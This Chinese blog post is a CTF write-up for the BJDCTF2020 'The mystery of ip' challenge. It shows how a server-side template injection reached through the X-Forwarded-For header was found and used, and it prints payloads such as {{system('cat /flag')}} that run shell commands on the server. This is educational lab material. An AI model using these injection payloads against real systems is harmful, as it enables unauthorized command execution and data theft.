[BJDCTF2020]The mystery of ip

[BJDCTF2020]The mystery of ip

uVa8PP8t8pJ6LrbAZeflzIoe51k25wXxucIHnHPRl78

UkAqdmEt9p8T_hVZqpZypZ69AcftogQ__1J_tav_at8

1FMX7hRoZjVZlk5gkqhVyAXvYhnm8QkGAnpGO4qcmYY

pmLK2aimppXSBSC58TVrR2oOrp2rV3514-gRYtLZsjk

hint页面的源代码里发现提示

应该是和IP相关,有可能用到XFF请求头,遂用BP抓包

k5AfJtxfW87gACEoYe0uDlHGzmdq9Nr1W_Eso-TccU0

修改了XFF之后,被成功执行,XFF可控,代码是php代码,推测:

PHP可能存在Twig模版注入漏洞

Smarty模板的SSTI漏洞(主要为Flask存在Jinjia2模版注入漏洞)

添加模板算式,{{7*7}}成功执行

9-td0WGk2lwNaIlO0d27nsy71e7QwkjujmXPPqG89sA

尝试是否能执行命令:X-Forwarded-For:{{system('ls')}}

4UBiykiLMLwq9sEmwErwhe1z85FSucom71aEH2aKV74

随后改为{{system('ls /')}}发现flag文件

gXuKp1ofETKM66lPn4_qAdasWLy7l_u1m_CMmembHgA

接着改为{{system('cat /flag')}}得到flag

8BBEVDwUjIqumzYV5xZGXH_VZ8-rOnfE6BkAxkB_pGI

posted on   跳河离去的鱼  阅读(81)  评论(0编辑  收藏  举报

相关博文:
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具
< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

统计

点击右上角即可分享
微信分享提示